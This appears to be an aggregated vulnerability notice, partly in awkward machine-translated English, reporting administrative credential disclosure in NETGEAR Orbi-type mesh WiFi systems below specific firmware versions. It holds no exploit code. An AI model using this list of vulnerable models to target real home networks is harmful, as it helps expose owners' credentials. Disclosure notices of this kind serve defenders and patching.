Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25. plural NETGEAR Devices contain vulnerabilities in insufficient protection of credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR RBK752, etc. are all home WiFi systems of NETGEAR. There are security vulnerabilities in many NETGEAR products. Attackers can use this vulnerability to obtain management credentials

Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects MK62 before 1.0.4.92, MK63 before 1.0.4.92, MR60 before 1.0.4.92, MS60 before 1.0.4.92, RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBS750 before 3.2.15.25, RBR750 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25. plural NETGEAR Devices contain vulnerabilities in insufficient protection of credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This affects MK62 prior to 1.0.4.92, MK63 prior to 1.0.4.92, MR60 prior to 1.0.4.92, MS60 prior to 1.0.4.92, RBK752 prior to 3.2.15.25, RBK753 prior to 3.2.15.25, RBK753S prior to 3.2.15.25, RBS750 prior to 3.2.15.25, RBR750 prior to 3.2.15.25, RBK842 prior to 3.2.15.25, RBR840 prior to 3.2.15.25, RBS840 prior to 3.2.15.25, RBK852 prior to 3.2.15.25, RBK853 prior to 3.2.15.25, RBR850 prior to 3.2.15.25, and RBS850 prior to 3.2.15.25